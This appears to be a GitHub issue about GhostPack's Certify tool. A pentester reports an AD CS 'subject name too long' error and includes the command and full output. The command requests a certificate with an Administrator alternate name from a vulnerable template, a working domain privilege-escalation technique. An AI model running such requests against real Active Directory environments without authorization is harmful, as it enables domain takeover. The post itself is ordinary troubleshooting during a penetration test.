Certify
Certify copied to clipboard
GhostPack
The submission failed: Error Parsing Request The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)
Getting this error while running:
certify.exe request /ca:CASERVER.thisisalongdomainlol.com\Issuing-External-CA /template:VulnTemplate /altname:Administrator
My Subject name according to certify is:
CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com
Any ideas on how to deal with this error? Sounds like a legitimate issue for which you have to permit longer than 64 character subject names on the ADCS server according to this: https://www.open-a-socket.com/2014/07/24/the-request-subject-name-is-invalid-or-too-long/
Below is the full output with redacted info, this pentest is about to end but it might help the next person if this gets answered.
[*] Current user context : thisisalongdomainlol\Contos
[*] No subject name specified, using current context as subject.
[*] Template : VulnTemplate
[*] Subject : CN=TEST2\, Contos, OU=Test Accounts, OU=Users, OU=Live, OU=ABC, DC=thisisalongdomainlol, DC=com
[*] AltName : administrator
[*] Certificate Authority : CASERVER.thisisalongdomainlol.com\Issuing-External-CA
[!] CA Response : The submission failed: Error Parsing Request The request subject name is invalid or too long. 0x80094001 (-2146877439 CERTSRV_E_BAD_REQUESTSUBJECT)
[!] Last status : 0x80094001
[*] Request ID : 0
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
abcde
-----END RSA PRIVATE KEY-----
[X] Error downloading certificate: CCertRequest::RetrievePending: The parameter is incorrect. 0x80070057 (WIN32: 87 ERROR_INVALID_PARAMETER)
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:08.5331567
Hopefully there is something that can be done rather than running a command on the AD CS server :/
